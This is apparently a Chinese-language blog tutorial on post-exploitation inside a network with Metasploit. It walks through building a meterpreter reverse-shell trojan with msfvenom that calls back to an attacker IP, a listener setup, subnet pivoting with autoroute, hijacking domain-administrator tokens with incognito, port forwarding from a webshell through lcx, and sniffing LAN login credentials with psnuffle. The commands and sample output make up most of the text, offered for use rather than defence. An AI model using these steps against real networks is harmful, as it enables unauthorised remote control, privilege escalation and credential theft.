Metasploit之内网渗透
------------------------------------------------------------------------------------------------
(一)在已经有某目标的情况下,对该目标的内网进行的渗透
参考文献:参考文献:http://www.2cto.com/article/201410/339765.html
前期步骤参考
09-Metasploit之我的远程控制软件
21-Metasploit之多种后门生成
首先需要一个目标,举例如下:
(1)生成一个木马文件(假设本机IP:192.168.2.146,端口:1234)
msfvenom -p windows/meterpreter/reverse_tcp LHOST=你的ip LPORT=你的端口 -f exe -o payload.exe
(2)msf下使用反弹连接
msf > use exploit/multi/handler
(3)设置反弹需要的payload
set payload windows/meterpreter/reverse_tcp
(4)查看配置选项
show options
(5)设置反弹回来的我们自己的主机IP和端口
set lhost 192.168.2.146
set lport 1234
(6)目标主机打开木马程序文件payload.exe,得到反弹shell
meterpreter >
接下来的步骤就是对于这个目标主机的内网渗透的步骤了:
run get_local_subnets -->获取目标的网卡信息
run autoroute -s 192.168.2.0/24 -->扫描有效网卡的整个C段的信息
run autoroute -p -->查看域环境,DOS下的查看域的命令是“net view”
劫持域管理的方法
use incognito -->调用劫持域管理模块
list_tokens -u -->查看当前目标主机的域环境信息
PS:当前我的测试环境是不存在域的,所以返回信息如下
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
Delegation Tokens Available
========================================
GOS-01601281118/Administrator
NT AUTHORITY/SYSTEM
Impersonation Tokens Available
========================================
No tokens available
这里我假设我的域管理是这个“GOS-01601281118/Administrator”,那么接下来的劫持是这样的
impersonate_token GOS-01601281118/Administrator -->劫持域管理
如果劫持成功,那直接可用“shell”命令,获得域管理的shell
PS:内网域渗透参考
http://www.freebuf.com/articles/web/5783.html
http://www.freebuf.com/articles/web/5901.html
------------------------------------------------------------------------------------------------
(二)web渗透测试中,有webshell的情况下,目标服务器和自己都是内网,关于转发的msf技术
参考文献:http://www.freebuf.com/articles/web/42208.html
1.在公网ip机器上(thinkpad物理机,ip:192.168.253.1)使用lcx建立监听两个端口300,200
2.在metasploit中使用exploit/multi/handler模块,利用payload windows/meterpreter/bind_tcp 连接公网ip的300端口。(这相当于在公网ip上执行了windows/meterpreter/bind_tcp模块,绑定的端口是200)
3.制作一个msfpayload 模块选择windows/meterpreter/reverse_tcp,连接公网ip的200端口。这样可以将两个机器进行连接。
4.接着执行payload
5.获得一个meterpreter控制台,可以开始进行执行命令了。如果你觉得命令行用着不爽,可以直接使用run vnc命令,获得一个gui操作
------------------------------------------------------------------------------------------------
内网嗅探的使用
use auxiliary/sniffer/psnuffle -->使用嗅探模块
run -->运行开始嗅探
此时内网中的一些登陆就会被嗅探到账户密码信息
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论